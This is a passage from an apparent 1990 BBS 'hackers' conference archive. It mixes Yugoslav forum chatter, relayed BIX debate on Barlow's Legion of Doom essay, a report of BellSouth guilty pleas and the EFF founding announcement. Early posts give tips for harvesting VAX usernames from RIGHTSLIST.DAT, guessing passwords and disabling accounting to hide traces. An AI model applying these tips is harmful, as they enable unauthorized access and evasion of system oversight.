zelite hakerisati po sistemima, pokusajte se domoci dokumentacije o sistemu (ima gomila zanimljivih i korisnih informacija, stedite vrijeme i mnogo brze i vise mozete nauciti o sistemu), a zatim se uhvatite posla i napravite haos. Upozorenje: imacete vise koristi ako ne uradite haos, vec ako neprimjetno koristite informacije koje kolaju kroz sistem. Ovdje vec dolazimo do razlike izmedju bolesnih i normalnih hakera (bolesni su oni koji npr. pisu viruse). Nadam se da ce se neko ukljuciti u raspravu kakva su to bica hakeri i kako provaliti u sisteme npr. JUPAK. Nadam se da od ovih 800 korisnika SEZAM-a postoji nekoliko hakera koji su voljni razmjeniti svoja znanja makar pod nekom sifrom !XXXXX, ako ne ovdje. Dras! P.S. Ovo je cisto zato da onih 90% korisnika SEZAM-a, koji se nikad ne usude javiti nekom porukom, ima sta citati.
hackers.33 dejanr,
Neću da kažem da je iko od nas "čist" po svim pitanjima hakerisanja ali ipak da izložim svoje iskustvo. Najjednostavniji način da dobijete username je da ga zatražite. Ima puno sistema. Negde će vam ga dati. Tada ste mirni i legalni i mnogo srećnije koristite računar. Inače, nasumice se sigurno može "uloviti" neki username - dosta recimo na VAX-u da pogledate SYS$SYSROOT:[SYSEXE]RIGHTLST.DAT (binarni format ali prepznatljiv, čak i običnim DUMP) i pročitate SVE username-ove. Možete pogoditi i password, većina korisnika ga glupo bira. Ali, ni operateri nisu naivni - što se više šetate, pre će vas uhvatiti. I šta onda? Ne zaboravite i na novi zakon - možda vas neće samo izgrditi. Mislim da se većina "provala" u sisteme ne zasniva na nekoj velikoj pameti hakera nego na glupim propustima onih koji to obezbeđenje planiraju. Morris je provalio pomoću jedne dobro poznate i dokumentovane mane OS-a - mnogi su znali ali ih je mrzelo da se obezbede. Dok nije bilo kasno... Inače, po pitanju slepih putnika, dosta se o tome priča i piše. Vidim da ti pominješ probleme ukrcavanja, sakrivanja po potpalublju, nabavke hrane itd. Međutim ima tu još jedan problem koji je u literaturi uočio jedino Isaac Asimov ("Druga zadužbina"). Znate koji? Pozdrav, Dejan
hackers.34 dejanr,
Evo jedne zanimljive diskusije na hakersku temu o kojoj i ovde razgovaramo sa Zagreb BBS-a (znamo da se Darko neće ljutiti što je prenosimo :)) ), konferencija Hackers. Msg #: 179 From: MAJA FAJDIGA Sent: 06-26-90 06:27 To: ALL Rcvd: 06-28-90 05:33 Re: DECNET Danas sam visila na BIXu oko cas (COMMIE - X.25), kad me je SySop lepo skinuo dole..srecom, nije vidio sto radim, jer inace bi me odrali na licu mesta, ovako ce mi samo oprati glavu.... Dakle, ljudi, ovo je seriozna poruka (na zalost)...na Decserver ce instalirati phone nr. tracking device, a razne hacker fore su a criminal offence, a na IJS imamo bezposelne SUpovce, koji traze neki posao.... A rumor goes da ce jos poostriti pristup na JUPAK i jos sasjeci privilegije..... Radi se o tome (neprovjereni trac, ali plauzibilan), da se od 10.6. sve usluge mora placati u hard currency, a nova slovenska vlada je sasjekla fond za znanost te ima i namjeru da zatvori sve nerentabilne odjele IJS. To znaci, da je Maja (fizika nije profitonosna) uskoro na cesti, pa ce bit zahvalna za pokoju picu :(( :)) A ljudi na E-6, E-4 i ostalim kompjuterskim odjelenjima se bore za zivot, pa uopste vise ne znaju za salu... Maja Msg #: 181 From: SINISA DJUREKOVIC Sent: 06-26-90 10:09 To: MAJA FAJDIGA Rcvd: 06-27-90 08:25 Re: (R)DECNET Ne vjerujem da ce covjek (zena) tvojih sposobnosti ostati bez posla. Ako to ipak bude slucaj, put pod noge pa na Zapad. Ne treba bacati bisere pred svinje. S. Msg #: 182 From: MARKO SILADIN Sent: 06-26-90 19:22 To: MAJA FAJDIGA Rcvd: 06-27-90 08:25 Re: (R)DECNET Maja, sto se tice pice nema problema, ako dojes u Zagreb sigurno cemo skupiti lovu za picu. ;-) :( ... No ovo sto si rekla (napisala) o postravanju ulaza na Jupak i sl. Nije bas za veselje. Nadam se da ce se to na neki nacin kompenzirati (jedino mi za sade ne pada na pamet kako! ...Marko Msg #: 183 From: MARKO RAKAR Sent: 06-26-90 22:52 To: DEJAN RISTANOVIC Rcvd: -NO- Re: (R)SKRETNICA Eh, eh za DecNet me vezu neke uspomene, ali to Dejane svakako nije pokusavanje logiranja na tudje ime, a najmanje na tvoje. Ima na tom DecNetu neke jako korisne konferencije koje se meni jako svidjaju. Jedino mi je zao sto nemogu sam na DecNet nego samo uz prisustvo drugih.Ah, ah DecNet snu snova... Pozdrav od hackera Marka Msg #: 184 From: MARKO RAKAR Sent: 06-26-90 22:55 To: SINISA DJUREKOVIC Rcvd: 06-27-90 12:10 Re: (R)DECNET Slazem se sa tobom Sinisa da bi zaista bio zlocin protiv covjecanstva da telekomunikacijski talent (i uz to jedini zenski) ostane bez posla. Slovenska vlada ce izgubiti najmanje jedan ali vrijedan glas ako nasa Maja1 ostane bez posla. Pozdrav Marko p.s. onaj Maja1 je potanko objasnjen u unix conf. Msg #: 185 From: MAJA FAJDIGA Sent: 06-27-90 08:28 To: ALL Rcvd: 06-28-90 06:02 Re: THANK YOU, PALS!!!!!! Hvala svima na podrsci....(verbalnoj, moralnoj.........)!!!!!! Nazalost, vase lepo misljenje o 'Maja1' ne dijele svinje od utjecaja... Pozdrav svima!!!!!!!!!!!!!!!!!!!!! Maja Msg #: 186 From: MARKO RAKAR Sent: 06-27-90 20:06 To: MAJA FAJDIGA Rcvd: 06-27-90 22:23 Re: (R)THANK YOU, PALS!!!!!! Napisacu jedan tekst o organskim kompjutorima (opisat cu posebno model MAJA1). Ubacit cu sve ono fatal errore koje smo izmjenili i to sve cemo poslati Dejanu u Racunare - tada ce se moci svi samo gledati, a mi cemo pobrati lovorov vijenac za knjizevnost :=)))) Pozdrav Marko Msg #: 187 From: MAJA FAJDIGA Sent: 06-27-90 22:23 To: MARKO RAKAR Rcvd: -NO- Re: (R)THANK YOU, PALS!!!!!! I am very honoured to become the object of the Nobel laureate (for literature) to be..... :)))))))))))))))))))) Pozdrav Maja P.S. Out of text error. Msg #: 191 From: DEJAN RISTANOVIC Sent: 06-29-90 00:37 To: MAJA FAJDIGA Rcvd: -NO- Re: (R)DECNET >> Dakle, ljudi, ovo je seriozna poruka (na zalost)...na >> Decserver ce instalirati phone nr. tracking device, a >> razne hacker fore su a criminal offence, a na IJS imamo >> bezposelne SUpovce, koji traze neki posao.... Jesam li dobro shvatio? Kad neko pozove znace koji broj zove i odakle? Jel to tehnicki izvodljivo kod nasih posta (pretpostavljam da je potrebna saradnja i prijemne i pozivne poste a to je u obilju opreme raznih proizvodjaca SF... Ja znam da je postojala sprava zvana lovac ali znam i kako se lovilo - blokira vezu pa traze po zicama... traje satima! Da to samo ne plase narod? Pozdrav, Dejan
hackers.35 dejanr,
>> Inače, nasumice se sigurno može "uloviti" neki username >> - dosta recimo na VAX-u da pogledate >> SYS$SYSROOT:[SYSEXE]RIGHTLST.DAT (binarni format ali >> prepznatljiv, čak i običnim DUMP) i pročitate SVE >> username-ove. Whoops, RIGHTSLIST.DAT. Tri stvari na VMS-u nikako da zapamtim: ime ove datoteke, da li se kaže SHOW PROC /ALL ili SHOW PROC /FULL i kako se zove datoteka u koju se upisuju podaci o radu korisnika (ACCOUNTNG.DAT? ACCOUNTING.DAT? Tako nešto). Pozdrav, Dejan
hackers.36 dkropek,
MF> To znaci, da je Maja (fizika nije profitonosna) uskoro na cesti, Sirota Maja. DR> Morris je provalio pomocu jedne DR> dobro poznate i dokumentovane mane OS-a DK> Ukoliko zelite hakerisati po sistemima, DK> pokusajte se domoci dokumentacije o sistemu (ima gomila DK> zanimljivih i korisnih informacija Slazemo se, zar ne ? DR> Najjednostavniji nacin da dobijete username je da ga DR> zatrazite. Ima puno sistema. Negde ce vam ga dati. Zar ce jedan haker da moljaka username ? Uostalom, moze se dobiti, ali neka sirotinja i pristup neatraktivnim dijelovima sistema. Jedino ukoliko imate nekog hrabrog poznanika... Kako objasnjavas to da me skoro svi znaju u prije spomenutom racunarskom centru, ali mi nitko ne zeli dati password, (sto mi naravno nije potrebno :) ), pa cak me ni ne pustaju blizu terminala ? (mala sala) DR> Inace, po pitanju slepih putnika, dosta se o tome prica i DR> pise. Sto se to prica i pise ? Ne citam nista osim Sezama i Racunara :) ,te oglasa u MM. DR> Medjutim ima tu jos DR> jedan problem koji je u literaturi uocio jedino Isaac DR> Asimov ("Druga zaduzbina"). Znate koji? Ne, koji ? DR> kako se zove datoteka u koju se upisuju podaci o DR> radu korisnika (ACCOUNTNG.DAT? ACCOUNTING.DAT? Tako nesto). Ne znam kako ona glasi na VAX/VMS-u, ali to je jedna od onih prljavih operaterskih datoteka u koju se naivci nalove kao musice u paukovu mrezu. Naravno, i to se moze srediti, potreban je samo jedan korak dalje u razmisljanju i ... :> DR> Jesam li dobro shvatio? Kad neko pozove znace koji broj zove DR> i odakle? Jel to tehnicki izvodljivo kod nasih posta Vjerojatno jeste. To bi bilo veoma gadno. Fuj. Mislim da bi se i to dalo srediti, samo bi netko na posti mogao ostati bez posla (barem za ovo sto mi je palo na pamet), naravno ukoliko ga prokljuve, ali to nam nije cilj, zar ne ? DR> Da to samo ne plase narod? Nadam se. Ok, dosta za danas. Dras!
hackers.37 dejanr,
>> Sto se to prica i pise ? Ne citam nista osim Sezama i >> Racunara :) ,te oglasa u MM. Ah, mislio sam na slepe putnike u literaturi (one prave!) a ne hakere. To je u vezi sa sledećim. >> DR> Medjutim ima tu jos jedan problem koji je u literaturi >> DR> uocio jedino Isaac Asimov ("Druga zaduzbina"). Znate >> DR> koji? >> >> Ne, koji ? Citat iz Druge zadužbine: "U spremištu za prtljag Arkadija u početku utvrdi da joj iskustvo pomaže a zatim da joj nedostatak istog odmaže. Tako je početno ubrzanje sačekala sa ravnodušnošću..... Kasnije, međutim, Arkadiju sustiže nedostatak iskustva. U mikro knjigama i na video-emisijama slepi putnici kao da su imali neograničene sposobnosti za skrivanje. Naravno, uvek je postojala opasnost da se nešto pomeri i uz obavezni tresak padne, ili da se kine - na video-emisijama gotovo je bilo sigurno da ćeš kinuti. Sve je to dobro znala i pazila je. Shvatila je i to da može ožedneti i ogladneti. Za to se pripremila uz pomoć konzervi iz ostave. Ali, bilo je još nečega što filmovi nisu spominjali, a Arkadija sa zaprepašćenjem shvati da, uprkos najboljim namerama na svetu, u spremištu može ostati skrivena samo za jedno ograničeno vreme..." Rade li sada klikeri? Dva slova, ASCII kodovi 87 i 67. >> Ne znam kako ona glasi na VAX/VMS-u, ali to je jedna od >> onih prljavih operaterskih datoteka u koju se naivci >> nalove kao musice u paukovu mrezu. Naravno, i to se >> moze srediti, potreban je samo jedan korak dalje u >> razmisljanju i ... :> Set Accounting /Disable? Ali i za to treba Oper privilegija...
hackers.38 dejanr,
Nastavak diskusije: Msg #: 192 From: MAJA FAJDIGA Sent: 06-29-90 06:07 To: DEJAN RISTANOVIC Rcvd: -NO- Re: (R)DECNET Pa, ne znam... moguce, da ce stvar raditi samo na podrucju Lj. A narod ne plase, jer ovo nije uopce poznato.... Inace, ako ce im se ciniti, da netko (pre)dugo visi negdje, jednostavno ce ga zbaciti , provjeriti razloge za set host/x29 i eventualno skinut privilegije ,,,,, No, nesto se prica o dobivanju besplatnog IXI prikljucka. Ako na tome zaista nesto ima, to ce iz korijena promijenit stvari (pa i ljude na E-6 treba razumeti, racuni dodju, treba ih platit iz vlastitog djepa, jer nema dogovora s ostalim nodovima ...jugo-balkan ... a plate na IJS bas i nisu preterane i bez nepredvidenih izdataka :( ) Pozdrav! Maja Msg #: 194 From: SYSOP Sent: 06-29-90 07:11 To: DEJAN RISTANOVIC Rcvd: -NO- Re: (R)DECNET Nove telefonske centrale tipa SPC (Storage Program Control, u biti kompjuteri iz dva djela: upravljacki i komutacijski, npr: Ericsson AXE-10, MD-110, ASB-501..) odreda imaju digitalnu komutaciju. To znaci da se analogni signal na ulazu digitalizira, i takav putuje do odredisne centrale (ako je prolazni put digitalan, avakako.. U Zagrebu su vec mnoge centrale tipa AXE-10 i prolazni putevi digitalizirani). S novom tehnologijom je bilo logicno ugraditi nove funkcije, koje se ISPROGRAMIRAJU u softveru, jer je to jednostavno. Neke od novih fukcija su: preusmjeravanje veze, "call wait", konferencijska veza, narucivanje budjenja, "do not disturb"... (Ako trebaju dodatna objasnjenja, pitati na AXE-10 BBS-u ili slicno..) No, da skratim. Jedna od osnovnih mogucnosti AXE-10 centrale je poznavanje kompletnog komunikacijskog puta od A do B pretplatnika. Kada bi na AXE-10 centralu postavili pravi tip telefona (s LCD ekranom..) mogli bismo koristiti uslugu da vidimo tko nas zove i prije nego dignemo slusalicu, te bismo na temelju te informacije mogli odluciti hocemo li se javiti ili ne. Neat, isn't it? Pozdrav! Darko Msg #: 195 From: MARKO RAKAR Sent: 06-30-90 14:31 To: DEJAN RISTANOVIC Rcvd: 07-01-90 03:16 Re: (R)DECNET Ah, Dejane - po nasoj posti sve je moguce. U Zagrebu je na Jupaku instaliran isti takav "lovac" ali on ne radi tako da napise koji ga je broj zvao nego jednostavno provjerava da li su na liniju spojeni telefoni koji na to imaju pravo. Ako to nisu tel. brojevi sa popisa (kojih je jako malo, tj provjerava se linija izmedju registriranog usera i "lovca") tada se zove sa nekog drugog broja i to je kraj tvoje veze tj. istog dana se mijenja password. Pozdrav Marko Msg #: 196 From: MARKO RAKAR Sent: 06-30-90 14:33 To: SYSOP Rcvd: 06-30-90 20:32 Re: (R)DECNET Darko ja sam taj sistem (kome cu se javiti ili ne) rijesio sa sekretaricom - jedini zenski komad hardware-a u mojoj kuci. Pozdrav Marko
hackers.39 dejanr,
U prilogu je: TITLE: Article on overenthusiastic crackdown on the Legion of Doom This is a very long article (~64K) scheduled for the next issue of the Whole Earth Review. The author desires non-paper electronic publication before it comes out in the WER. It discuss some very important issues of liberty in the telecomunications future were are starting to inhabit, and is very highly recommended for all computer people who care about freedom. It's also pretty well written. CRIME AND PUZZLEMENT by John Perry Barlow barlow@well.sf.ca.us crimpuzz.zip
hackers.40 dejanr,
Diskusija o hakerima koju je "isprovocirao" tekst koji smo preneli je žestoko skrenula u filozofske vode. Ali kad smo već počeli, da ne odustajemo (za sada): ========================== tojerry/hackers #319, from bill_lewis, 1405 chars, Mon Jul 2 22:18:10 1990 This is a comment to message 317. There is/are comment(s) on this message. -------------------------- Comment on Legion of Doom posting, tojerry/long.messages #439 The basic theory comes straight from Nietzsche and, I believe, Weber, with a certain admixture of existentialism, Rousseau and a bit of name calling. All very conventional. 1) "..we have been, for a over a century, experiencing a terrifying erosion in our sense of both body and place." Same consequences Nietzsche attributed to the death of religious faith (called "Death of God"). "..he may now be fairly humming with nameless dread." The basic existential experience (liniage is Heidegger, from Nietzsche), formerly attributed to a realization that belief is groundless, here attributed to Virtual Reality. 2)"Those of us who are of the fearful persuasion do not like ambiguities. " The author does not mean himself here, as he opposes the policies he claims are inspired by those "of the fearful persuasion." The author means the middle class, which has (since Rousseau) been obliquely described this way. Weber apparently pointed out that the middle class is dependent on rational thought that it did not invent and cannot extend, and is thus characterized by a deep dislike for and inability to deal with ambiquity. Inner directed personalities (presumably like Barlow, who claims to be taking steps to continue ambiguity) create their own values and welcome ambiguity as raw material for value creation. ========================== tojerry/hackers #320, from bill_lewis, 1271 chars, Mon Jul 2 22:19:05 1990 This is a comment to message 319. There is/are comment(s) on this message. -------------------------- 3) "The perfect bogeyman for Modern Times is the Cyberpunk! He is so smart he makes you feel even more stupid than you usually do. He knows this complex country in which you're perpetually lost. He understands the value of things you can't conceptualize long enough to cash in on. He is the one-eyed man in the Country of the Blind." Cyberpunk as artist. The author proceeds to follow Nietzsche's argument to the effect that the middle class is the implacable enemy of the artist, although the artist is necessary for the existance of the highest human experiences: e.g. "Perhaps the most frightening thing about the Cyberpunk is the danger he presents to The Institution, whether corporate or governmental. If you are frightened you have almost certainly taken shelter by now in one of these collective organisms, so the very last thing you want is something which can endanger your heretofore unassailable hive." Artist as enemy to the middle class, middle class enemy of the Artist. 4) Barlow then proceeds to imply that the middle class is strongly influenced by what appear to be religious (the Devil passages) Nazis (the Martin Neimoeller quote). This is the name calling mentioned above. He offers to oppose the middle class in this matter. ========================== tojerry/hackers #322, from bill_lewis, 1176 chars, Mon Jul 2 22:22:43 1990 This is a comment to message 320. There is/are comment(s) on this message. -------------------------- Surprisingly enough, perhaps, much of the middle class does look upon this sort of thing with favor. It is tempting to think that one is a rugged survivor type, capable of abandoning reason and society and, as existential hero, confronting reality on its own terms. The ambivilant attitude toward drug use from about 1970 through 1980 may have been an expression of yielding to that temptation, for example. Barlow's article, which purports to be about supporting hackers (artists) who go one to one with a new reality, inconceivable to the middle class, offers precisely this temptation. Barlow's real interest must be the interest of the theory that he uses: replacement of the Enlightenment societies by something else, something else without a middle class. His theoretical justification permits no other goal. Similar attempts have, since 1900, succeeded nowhere and killed several tens of millions of people. This is just more of the same, and I, for one, do not look upon it with favor. Furthermore, I hope that the lessons of the last few times this theory was tried will not be lost on the BIXen reading this. I've seen enough havoc. ========================== tojerry/hackers #323, from rdobbins, 189 chars, Mon Jul 2 23:28:49 1990 This is a comment to message 322. There is/are comment(s) on this message. -------------------------- I think it's time for a reality check. Why do you persist in relating everything back to these same so-called "philosophers" whom you have repeatedly cited over in baen? Give me a break. ========================== tojerry/hackers #324, from arog, 141 chars, Tue Jul 3 01:13:53 1990 This is a comment to message 323. There are additional comments to message 323. -------------------------- Roland, we have indeed found a ground of agreement.... now if we can get a little lightning to come by and do a mv <thread> .... hint.... ========================== tojerry/hackers #325, from arog, 298 chars, Tue Jul 3 01:17:32 1990 There is/are comment(s) on this message. -------------------------- To drag this topic back into the murk where it belongs.... It has been asserted that 'hacking' is derived from carpentry.... and the use of an axe to "hack" wood into chairs and other such things.... Ok, to go off on a fishing_expedition..... ========================== tojerry/hackers #330, from lbsisk, 228 chars, Tue Jul 3 09:15:32 1990 This is a comment to message 329. There is/are comment(s) on this message. -------------------------- Bill - I find the material you have been posting informative and thought-provoking, notwithstanding some other comments to the contrary from some-one perhaps ill-equipped to consider them thoughfully. Pray continue. - Lindy ========================== tojerry/hackers #333, from rsimonsen, 572 chars, Tue Jul 3 15:57:35 1990 This is a comment to message 322. There is/are comment(s) on this message. There are additional comments to message 322. -------------------------- I would contend with your characterization of system-crackers as "artists". Simply because they are clever at penetrating computer security systems does not qualify them for the label of "artist" any more than it would be applicable to a clever second-story man who was adept at getting past physical security systems. Technical virtuousity is not art. And, moreover, inasmuch as "artist" is a basically positive appellation, it is incorrect to award it to a cracker merely because he exhibits such virtuousity in an arguably non-creative, non-positive act. --Redmond ========================== tojerry/hackers #338, from marlin, 650 chars, Tue Jul 3 23:08:20 1990 This is a comment to message 322. There is/are comment(s) on this message. -------------------------- Pretty interesting stuff up to thepoint where I missed the switch from commentary to something about mass murder. How'd that happen? It would be my guess that Barlow's outline for his article was not nearly as formal as your own, nor do I believe he drew upon the same resources. It is scary, really scary, to see how much of their freedoms people are willing to give up in order to be safe. And I just don't see how you got from Barlow's calling for fredom, the rights of free speech, and for the exercise of informed responsibility by the enforcers of the laws all the way over to the murder of tens of millions. Can you tell me what I missed?
hackers.41 dejanr,
[Nastavak prethodne] ========================== tojerry/hackers #341, from bill_lewis, 339 chars, Tue Jul 3 23:50:42 1990 This is a comment to message 333. There is/are comment(s) on this message. -------------------------- I agree. Most of my messages have to do with analysis of the arguments presented in tojerry long.messages 439. I'm arguing that the author is applying arguments developed by Nietzsche about artists to hackers. I didn't really address the validity of the argument, in part because I don't really know much about the people concerned. ========================== tojerry/hackers #342, from agni, 143 chars, Tue Jul 3 23:58:59 1990 This is a comment to message 338. There is/are comment(s) on this message. There are additional comments to message 338. -------------------------- safe from what. After a certain amount of Freedoms are "removed" you start loseing security.. take the present crisis in USSR, and in china. ========================== tojerry/hackers #343, from bill_lewis, 1098 chars, Tue Jul 3 23:59:48 1990 This is a comment to message 338. There is/are comment(s) on this message. -------------------------- Sorry the argument was unclear. My point was that Barlow's article, which contains an explicit and tightly organized theoretical justification for the foundation he proposes, has nothing whatsoever to do with freedom, the rights of free speech and the exercise of informed responsibility by the enforcers of the laws. It is, rather, a rehash of Nietzsche's basic arguments concerning the desirability of a non-Enlightenment society. That is all it is; nothing in that article (in tojerry long.messages 439) can be construed as supporting the Enlightenment ideas you cited. The transition to large numbers of deaths (not murders, really) is by a reference to history: that has been the usual result of trying to implement Nietzsche's school of thought or derivative schools of thought. And thanks for phrasing your question that way. I get a bit formal when I write about this sort of thing, and it gives the impression that I'm a bit too reserved, which tends in turn to make questions a bit less friendly than I'm confortable with. If this isn't a good enough answer, please let me know. ========================== tojerry/hackers #344, from bill_lewis, 639 chars, Wed Jul 4 00:01:54 1990 This is a comment to message 337. There is/are comment(s) on this message. -------------------------- It is likely that you didn't read my messages. I'm bringing up the philosophers again because the Legion of Doom article is just rehashed Nietzsche. Once you realize that, it is easier to cut through the fog and decide what to believe, what not to, and what might happen if the author's program is followed. As for giving you a "break," that's exactly what I'm doing. Your earlier messages concerning the article suggest that you haven't the foggiest notion of what it is about. I've supplied you with an explanation, which you can accept, reject, or criticize. That is a break, a service, which you can accept or reject. ========================== tojerry/hackers #345, from bill_lewis, 2284 chars, Wed Jul 4 00:03:18 1990 This is a comment to message 344. There is/are comment(s) on this message. -------------------------- In longer form: A good number of the ideas one sees are utterly unoriginal. With work, one can track them down to some long dead philosopher. I've done the work, and usually name the philosopher. This helps, because the philosopher has typically thought things through, and discusses the consequences of the idea as well as the idea itself. Furthermore, the ideas of a major philosopher have typically been applied many times, and one can see how well (or poorly) they work out. Surprisingly enough, they tend to work out about the same in practice no matter who applies them. If you don't know how they worked the last few times, you will find that ignorance is not invincible and, sure enough, they will work out about the same this time. The two principal schools of philosophy these days are the descendants of the Enlightenment and the descendants of the reaction to the Enlightenment (Rousseau, Nietzsche, et. al.), whom I have called trans-rationalists in conference "contact political". The name "trans-rationalist" is descriptive: these schools hoped to transcend Enlightenment rationality. They currently dominate the Universities, dominate many areas of politics in the US, and are heavily influential in the media. The trans-rational schools seem to be slowly losing ground to the Enlightenment schools. I refer by name to the specific philosophers who have done the basic work in reaction to the Enlightenment as a convenience, and because their works have never been improved upon. Typically, the next major philosopher in a school will extend the school rather than rephrasing his predecessor's work. Intellectuals, sort of the next rank down, will apply the work of a major philosopher without extending it. For example, Hegel was a philosopher, Lenin an intellectual, and Marx questionable. For example, the "Legion of Doom" article justifies the proposed foundation with considerable prose, assertions of police misconduct without supporting evidence (as jerryp has pointed out), and a considerable dollop of Nietzsche. All this is impressive if you are seeing it for the first time, unimpressive if one is familiar with the schools stemming from Nietzsche and how applications of these schools have worked out. ========================== tojerry/hackers #346, from bill_lewis, 1493 chars, Wed Jul 4 00:04:10 1990 This is a comment to message 345. There is/are comment(s) on this message. -------------------------- Let me add as another example that you, personally, are a middle class person claiming to exist as existential hero, without the support of Enlightenment thought. The contempt for theory you display does not mean you don't need Enlightenment theory, just that you don't understand it and don't want to. Basically, you confuse commercial success in an Enlightenment framework with direct confrontation of reality a la the existential hero. The two are not only different, they have nothing in common. Existence within the rigid strictures of commercial activity is held by the existentialists to utterly vitiate any claims to value positing. In other words, you can't conform to the conventions that make business possible during the day and utterly ignore them so as to create values in the evenings. If you don't create values, your opinions don't have the force of natural law, and require some substantiation. That is several "breaks" I've given you now. I don't claim to create values, so comments on the reasoning and cited facts are both possible and welcome. For anybody else who has gotten this far: I'm pretty tired, as you may have noticed, of seeing Nietzsche's and Rousseau's approaches dusted off and proclaimed modern as today. I'd like to see them recognized and given their proper weight when the pop up, which is why this seemingly endless series of message. I'm also tired of seeing people hurt trying to make the approaches work. ========================== tojerry/hackers #347, from hga, 237 chars, Wed Jul 4 00:14:17 1990 This is a comment to message 346. -------------------------- And I for one really appreciate your efforts, Bill. I personally don'thave much time to learn much about the good stuff (i.e. Enlightenment philosophy and it's antecedents), let alone "the bad stuff." The ugly (Marx) is right out :-) ========================== tojerry/hackers #348, from marlin, 255 chars, Wed Jul 4 00:21:02 1990 This is a comment to message 342. -------------------------- Safe from life. safety from people who might own guns, people who might state obnoxious opinions, people who might be using some sort of chemical based, mind altering substance, etc... Of course, if you've done nothing wrong, you have nothing to fear... ========================== tojerry/hackers #350, from marlin, 975 chars, Wed Jul 4 00:54:45 1990 This is a comment to message 343. -------------------------- So where do Barlow say he desires a "non-Enlightenment society"? To offer a condensed rehashing: Barlow manages to identify with the outlaws, then he identifies with the marshalls, and ends wishing to ride the range in peace. Along the way he described the territory of the range, and various groups of people who side the marshalls and those who side with the outlaws, and some who wish to strike a balance between the outlaw's freedom and the marshalls level of trust. I get the feeling that somewhere along the way, you had drawn so many parallels between Barlow's story and your body of knowledge regarding historical aspects of philosophy that you formed your comment in reaction to the parallels you'd made, sidestepping Barlow's article. Or confusing your map with his territory in someone else's words. I can understand people's adverse reactions to over-formality. Most folks don't like to be whomped with a textbook (or several shelves worth, in you case :-) ========================== tojerry/hackers #351, from rsimonsen, 214 chars, Wed Jul 4 05:43:23 1990 This is a comment to message 341. -------------------------- It is certainly then unclear that you do not intend to link artists and crackers. Why do you feel the nietzschean characterization of artists can be simply word-processed into applicability to crackers? --Redmond
hackers.42 dejanr,
Zanimljivi događaji u svetskom hakerskom svetu... obično se završavaju na sudu... ========================== tojerry/hackers #444, from hga, 1767 chars, Wed Jul 11 00:04:39 1990 There is/are comment(s) on this message. -------------------------- TITLE: "Computer Hackers Plead Guilty in Case Involving BellSouth" Is the title of an article in today's issue of _The Wall Street Journal_. It relates that three members of the "Legion of Doom pleaded guilty to conspiring to defraud BellSouth Corp. of computer information." Franklin E. Darden Jr., 24 years old, of Norcross, GA, Adam E. Grant, and Robert J. Riggs, both 22 and of Atlanta, were indicted in February. Darden and Riggs each pleaded guilty to one count of conspiring to commit computer fraud, and face maximum penalties of 5 years and a fine of $250,000. Grant pleaded guilty to possessing 15 or more devices that provided access to BellSouth computers with intent to commit fraud, and faces up to 10 years and $250,000. Sentencing is scheduled for September 14th. Darden will help BellSouth secure their systems, and acknowledged "that he was 'more or less a hacker,' ... [and] that his actions were simply a hobby at first. 'I hope anybody that's hacking out there now hears this and stops.'" The article includes this gem: "A hacker is a person who attempts to gain unauthorized access to computer files in various systems." It closes with the following two paragraphs: "The U.S. attorney in Atlanta, Joe Whitley, said that the three individuals belonged to the so-called Legion of Doom, a cadre of 15 computer hackers in Georgia, Texas, Michigan, Illinois, Flordia, New York, and other states. "Mr. Whitley said the group disrupted the telecommunications industry, monitored private telephone lines, stole proprietary information, stole and modified credit information, fraudulently obtained property from various companies, and disseminated information that allowed other computer hackers to enter BellSouth and other computer systems." ========================== tojerry/hackers #445, from rsimonsen, 64 chars, Wed Jul 11 01:24:04 1990 This is a comment to message 443. -------------------------- Could you relay some detail on those arrests? thanks, --Redmond ========================== tojerry/hackers #446, from rsimonsen, 94 chars, Wed Jul 11 01:27:51 1990 This is a comment to message 444. There is/are comment(s) on this message. -------------------------- Any specifics on what these guys actually did ? (beyond the list of charges I mean) --Redmond ========================== tojerry/hackers #447, from rsimonsen, 81 chars, Wed Jul 11 01:36:40 1990 -------------------------- TITLE: POINTER --> microbytes #953 on Kapor/Barlow organization et al. --Redmond ========================== tojerry/hackers #448, from hga, 84 chars, Wed Jul 11 01:43:47 1990 This is a comment to message 446. -------------------------- That's as specific as the article got. The US attorney would know more, of course.
hackers.43 dejanr,
ELECTRONIC FRONTIER FOUNDATION MISSION STATEMENT A new world is arising in the vast web of digital, electronic media which connect us. Computer-based communication media like electronic mail and computer conferencing are becoming the basis of new forms of community. These communities without a single, fixed geographical location comprise the first settlements on an electronic frontier. While well-established legal principles and cultural norms give structure and coherence to uses of conventional media like newspapers, books, and telephones, the new digital media do not so easily fit into existing frameworks. Conflicts come about as the law struggles to define its application in a context where fundamental notions of speech, property, and place take profoundly new forms. People sense both the promise and the threat inherent in new computer and communications technologies, even as they struggle to master or simply cope with them in the workplace and the home. The Electronic Frontier Foundation has been established to help civilize the electronic frontier; to make it truly useful and beneficial not just to a technical elite, but to everyone; and to do this in a way whic in keeping with our society's highest traditions of the free and open flow of information and communication. To that end, the Electronic Frontier Foundation will: 1. Engage in and support educational activities which increase popular understanding of the opportunities and challenges posed by developments in computing and telecommunications. 2. Develop among policy-makers a better understanding of the issues underlying free and open telecommunications, and support the creation of legal and structural approaches which will ease the assimilation of these new technologies by society. 3. Raise public awareness about civil liberties issues arising from the rapid advancement in the area of new computer-based communications media. Support litigation in the public interest to preserve, protect, and extend First Amendment rights within the realm of computing and telecommunications technology. 4. Encourage and support the development of new tools which will endow non-technical users with full and easy access to computer-based telecommunications. The Electronic Frontier Foundation One Cambridge Center Cambridge, MA 02142 (617) 577-1385 eff@well.sf.ca.us
hackers.44 dejanr,
From: geoff@fernwood.mpk.ca.us (Geoff Goodfellow) Newsgroups: comp.misc,comp.sys.ibm.pc,comp.sys.mac,comp. society.futures,news.sys Subject: NEW FOUNDATION ESTABLISHED TO ENCOURAGE COMPUTER-BASED COMMUNICATIONS Message-ID: <5122@fernwood.mpk.ca.us> Date: 10 Jul 90 14:55:24 GMT Followup-To: eff@well.sf.ca.us Organization: Anterior Technology, Menlo Park, CA USA Lines: 222 [Mitch Kapor asked me to post the following] FOR IMMEDIATE RELEASE Contact: Cathy Cook (415) 759-5578 NEW FOUNDATION ESTABLISHED TO ENCOURAGE COMPUTER-BASED COMMUNICATIONS POLICIES Washington, D.C., July 10, 1990 -- Mitchell D. Kapor, founder of Lotus Development Corporation and ON Technology, today announced that he, along with colleague John Perry Barlow, has established a foundation address social and legal issues arising from the impact on society of the increasingly pervasive use of computers as a means of communication and information distribution. The Electronic Frontier Foundation (EFF) will support and engage in public education on current and future developments in computer-based and telecommunications media. In addition, it will support litigation in the public interest to preserve, protect and extend First Amendment rights within the realm of computing and telecommunications technology. Initial funding for the Foundation comes from 